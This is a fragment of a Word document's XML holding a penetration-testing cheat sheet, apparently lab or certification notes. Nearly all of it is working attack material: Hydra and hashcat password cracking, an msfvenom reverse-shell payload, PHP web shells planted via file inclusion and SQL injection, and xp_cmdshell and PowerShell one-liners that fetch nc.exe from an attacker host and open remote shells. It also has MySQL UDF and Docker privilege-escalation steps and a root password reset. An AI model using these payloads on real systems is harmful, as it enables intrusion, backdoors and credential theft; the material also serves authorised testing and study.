      <w:proofErr w:type="gramEnd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 as .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED920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AddType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application/x-httpd-</w:t>
      </w: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php .blah</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4108A6D5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lastRenderedPageBreak/>
        <w:t>Cracking Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F51685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Cracking Web Forms with Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D9753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hydra 10.10.10.52 http-post-form -L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/share/wordlists/list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"/endpoit/</w:t>
      </w:r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login:usernameField</w:t>
      </w:r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=^USER^&amp;passwordField=^PASS^:unsuccessfulMessage"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-s PORT -P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/share/wordlists/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43532F08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Cracking Common Protocols with Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694024B0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hydra 10.10.10.52 -l username -P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/share/wordlists/list </w:t>
      </w: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ftp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ssh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smb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://10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC6B86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HashCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945C9A0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# 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Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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based on the pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554BFB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hashcat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-a3 -m0 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mantas?d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?d?d?u?u?u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--force --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potfile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-disable --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stdout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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B98FC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2238DCB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Generate password candidates: wordlist + pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A78BBF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hashcat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-a6 -m0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"e99a18c428cb38d5f260853678922e03"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yourPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/share/wordlists/rockyou.txt ?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?d?d?u?u?u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--force --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potfile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-disable --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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04CFB7E5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2FCE727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# Generate NetNLTMv2 with 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internalMonologue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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and crack with 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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E0AAB8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InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False 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challange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002233445566778888800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A643C6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resulting hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D2E4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spotless::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WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194455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3035BAC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# crack with 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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="184B54C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hashcat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-m5600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</w:t>
      </w:r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spotless::</w:t>
      </w:r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WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000'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-a 3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/share/wordlists/rockyou.txt --force --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potfile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-disable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF9479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Generating Payload with </w:t>
      </w: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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13EF96B3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msfvenom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-p windows/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shell_reverse_tcp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LHOST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10.11.0.245 LPORT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443 -f c -a x86 --platform windows -b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"\x00\x0a\x0d"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-e x86/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shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69751DB7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Compiling Code </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01DF0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lastRenderedPageBreak/>
        <w:t># Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD58367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i686-w64-mingw32-gcc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source.c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-lws2_32 -o out.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291EF64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23DB2FA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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEF68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gcc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-m32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-m64 -o output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source.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B054880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Local File Inclusion to Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB491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192.168.1.102 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEEE0AC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GET /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&lt;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?php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passthru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$_GET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cmd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])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E1BF9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Host: 192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3F21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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9BB6B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52BCB00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# Then send as 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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&amp;cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA669F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Local File Inclusion: Reading Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFA653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file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C795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77E811D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http://example.com/index.php?page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php://input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&amp;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cmd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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D013C1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POST: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&lt;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?php system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$_GET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cmd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])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="536B6093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http://192.168.2.237/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964CAE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POST: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&lt;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?php </w:t>
      </w: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system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uname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-a'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die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?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</w:p>
    <w:p w14:paraId="0AC9088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5D586873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expect://whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABDBF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http://example.com/index.php?page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php://filter/read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string.rot13/resource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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13228AE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http://example.com/index.php?page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php://filter/convert.base64-encode/resource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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F381A5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http://example.com/index.php?page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php://filter/zlib.deflate/convert.base64-encode/resource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/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16571B3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http://example.net/?page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data://text/plain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base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4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=&amp;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cmd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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC4C93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http://10.1.1.1/index.php?page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data://text/plain,%3C?php%20system%28%22uname%20-a%22%29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%20?%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D26857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42F98947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ZIP Wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14410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echo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"&lt;pre&gt;&lt;?php system(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$_GET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['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cmd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'])</w:t>
      </w:r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; ?</w:t>
      </w:r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&gt;&lt;/pre&gt;"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payload.php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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610B53C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zip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payload.zip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payload.php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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05C870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mv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payload.zip shell.jpg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</w:p>
    <w:p w14:paraId="4AE7647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http://example.com/index.php?page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zip://shell.jpg%23payload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A05820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305AB9E9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Loop through file descriptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AF849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curl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''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-H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'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d'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--output -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33DDCB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Remote File Inclusion Shell: Windows + PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD05CF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b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;?php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system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powershell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-Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http://10.11.0.245/netcat/nc.exe','nc.exe'); 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cmd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/c nc.exe 10.11.0.245 4444 -e cmd.exe\" }"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b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578BF7C7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SQL Injection to Shell or Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD6B0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Assumed 3 columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFCE4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http:</w:t>
      </w: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//target/index.php?vulnParam=0' UNION ALL SELECT 1,"&lt;?php system($_REQUEST['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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&gt;",2,3 INTO OUTFILE "c:/evil.php"-- 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uMj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CCA22E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# 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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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; post-request - captured request via Burp Proxy via Save Item to File.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A919D0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sqlmap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-r post-request -p item --level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5 --risk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3 --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dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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mysql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os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-shell --threads 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FEEA5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# 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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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reverse shell via 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mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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injection when 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xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882FE9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1000</w:t>
      </w:r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';+</w:t>
      </w:r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exec+master.dbo.xp_cmdshell+'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echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye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+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+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd'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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646ECE0F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SQLite Injection to Shell or Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E40D6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ATTACH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DATABASE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'/home/www/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public_html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/uploads/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phpinfo.php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as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pwn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</w:p>
    <w:p w14:paraId="0CE3479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CREATE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TABLE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pwn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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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code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TEXT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</w:p>
    <w:p w14:paraId="063D5807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INSERT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INTO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pwn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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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code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VALUES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'&lt;?php system($_REQUEST['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cmd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']);?&gt;'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7A66A98E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MS-SQL Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F83A273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mssqlclient.py -port 27900 </w:t>
      </w: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user:password@10.1.1.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07FBE4F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sqsh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-S 10.1.1.1 -U user -P password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C246F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Upgradig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 Non-Interactive Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E997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python -c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'import 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pty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; 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pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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("/bin/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sh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")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6431DCE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/bin/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busybox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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67F40A4A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Python Input Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183BB59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__import__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os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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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system</w:t>
      </w:r>
      <w:proofErr w:type="gram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'id'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14:paraId="45B138BE" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC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3C2AAC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Local Enumeration &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAAC49" w14:textId="5B352DD3" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311435F5" wp14:editId="56281833">
            <wp:extent cx="5943600" cy="2228850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LSPOrXeQsGUfhvZOKfQ%2F-LSPPIibuw-2XN2-WKC6%2Fprivesc.jpg?alt=media&amp;token=242858cc-b0d1-4d26-a9c5-5b37a398f1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bscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LSPOrXeQsGUfhvZOKfQ%2F-LSPPIibuw-2XN2-WKC6%2Fprivesc.jpg?alt=media&amp;token=242858cc-b0d1-4d26-a9c5-5b37a398f1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4F7F" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/sagishahar/lpeworkshop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6B950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Binary Exploitation with </w:t>
      </w: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ImmunityDebugger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40C02DC5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Get Loaded Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8B43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# We're interested in modules without protection, Read &amp; Execute permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1646B3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!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mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A2F4A8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Finding JMP ESP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11908A4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!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mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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find -s "\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xFF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\xE4" -m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moduleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="711596F0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Cracking a ZIP Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C6A8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fcrackzip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-u -D -p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/share/wordlists/rockyou.txt bank-account.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F81E6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Setting up Simple HTTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4751F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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77210CE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python -m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SimpleHTTPServer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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA053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python3 -m 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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17A7DBE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ruby -r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webrick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-e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WEBrick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::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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HTTPServer.new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(:Port =&gt; 80, :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DocumentRoot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=&gt; Dir.pwd).start"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB6E6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php -S 0.0.0.0:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B83911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MySQL User Defined </w:t>
      </w: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Fuction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 </w:t>
      </w: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Privilge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72297A" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>raptor_udf2.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>sid-shell.c</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">full </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>tarball</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE012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lastRenderedPageBreak/>
        <w:t>gcc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-g -shared -</w:t>
      </w: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Wl,-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soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o 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lc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="566F8BE9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use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mysql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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105759D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create table 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npn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(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line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D572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insert into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npn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values(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load_file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('/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tmp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/raptor_udf2.so'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA658A7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select * from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npn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into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dumpfile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'/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/lib/raptor_udf2.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3C97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create function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do_system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returns integer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soname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'raptor_udf2.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187415E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select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do_</w:t>
      </w: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system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(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'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chown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root:root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tmp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sid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-shell;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chmod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+s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tmp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sid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-shell');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878D938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Docker Privilege </w:t>
      </w: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Esclation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F3209D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echo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-e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"FROM ubuntu:14.04\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nENV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WORKDIR /stuff\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nRUN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mkdir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-p /stuff\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nVOLUME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[ /</w:t>
      </w:r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stuff ]</w:t>
      </w:r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\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nWORKDIR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/stuff"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Dockerfile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&amp;&amp;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docker build -t my-docker-image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&amp;&amp;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docker run -v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$PWD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:/stuff -t my-docker-image /bin/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sh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-c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'cp /bin/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sh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/stuff &amp;&amp; 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chown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root.root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/stuff/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sh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&amp;&amp; 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chmod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a+s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/stuff/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sh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&amp;&amp;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./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sh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-c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id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&amp;&amp;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./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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DAF73EA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Resetting root Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE9B7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echo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root:spotless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="289E2A2D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Uploading Files to Target Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4B7F2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TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1903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#TFTP Linux: cat /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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/default/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atftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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to find out file serving location; default in kali /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srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/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tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2996448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service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atftpd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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFD1E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33B3484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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7C33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tftp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$ATTACKER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get /download/location/file /save/location/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79385058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FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006F317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Linux: set up ftp server with anonymous logon access;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CA431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twistd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-n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ftp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-p 21 -r /file/to/serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C38B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1E98EA13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Windows shell: read FTP commands from ftp-commands.txt non-interactively;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B589EB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echo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open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$ATTACKER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ftp-commands.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD94B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echo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anonymous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ftp-commands.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF203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echo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whatever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ftp-commands.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531317B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echo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binary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ftp-commands.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80F955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echo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get file.exe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ftp-commands.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E9FA69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echo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bye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ftp-commands.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38616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ftp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</w:t>
      </w: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s:ftp-commands.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20FD0B9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26B2D75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Or just a one-liner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC91A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echo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open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10.11.0.245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&amp;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echo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anonymous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&amp;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echo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whatever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&amp;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echo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binary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&amp;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echo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get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nc.exe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&amp;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echo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bye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ftp.txt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&amp;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ftp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</w:t>
      </w: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s:ftp.txt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&amp;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nc.exe 10.11.0.245 443 -e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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="356D8EF6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lastRenderedPageBreak/>
        <w:t>CertUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47124989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certutil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exe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urlcache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f http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//</w:t>
      </w:r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>10.0.0.5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>40564.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exe bad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exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BE244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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4407D9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b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php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file_put_</w:t>
      </w:r>
      <w:proofErr w:type="gram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contents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"/var/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tmp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/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shell.php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file_get_contents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"http://10.11.0.245/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shell.php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));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b/>
          <w:bCs/>
          <w:color w:val="EE9900"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDCBB4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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC70E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python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c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"from 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urllib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import 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urlretrieve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; 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urlretrieve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(</w:t>
      </w:r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'http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D738CA9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 xml:space="preserve">HTTP: </w:t>
      </w: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Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44E7F1D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powershell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Command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"&amp; {(New-Object System.Net.WebClient</w:t>
      </w:r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).DownloadFile</w:t>
      </w:r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('http://$ATTACKER/nc.exe','nc.exe'); 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cmd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/c nc.exe $ATTACKER 4444 -e cmd.exe"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14:paraId="11363CD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powershell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Command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"&amp; {(New-Object System.Net.WebClient</w:t>
      </w:r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).DownloadFile</w:t>
      </w:r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('http://$ATTACKER/nc.exe','nc.exe'); Start-Process nc.exe -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NoNewWindow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-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Argumentlist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'$ATTACKER 4444 -e cmd.exe'"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14:paraId="68C80B1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powershell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Command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"(New-Object System.Net.WebClient</w:t>
      </w:r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).DownloadFile</w:t>
      </w:r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('http://$ATTACKER/nc.exe','nc.exe')"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Start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Process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nc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exe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NoNewWindow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Argumentlist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'$ATTACKER 4444 -e cmd.exe'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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E8A8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powershell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New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Object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System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Net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WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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).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DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="gram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'http://$ATTACKER/file.exe'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'file.exe'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);(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New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Object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com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Shell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Application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).</w:t>
      </w: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ShellExecute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'file.exe'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14:paraId="0EF4818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551B06B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># download using default proxy credentials and launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE7EE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powershell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command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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$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b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New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Object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System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Net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WebClient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$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b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Proxy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Credentials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System.Net.CredentialCache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]::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DefaultNetworkCredentials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$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b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DownloadString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"http://$attacker/nc.exe"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Out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File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nc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exe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Start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Process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nc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exe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NoNewWindow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Argumentlist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'$ATTACKER 4444 -e cmd.exe'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"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14:paraId="5AB7B351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HTTP: VBScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467223C" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste contents of </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
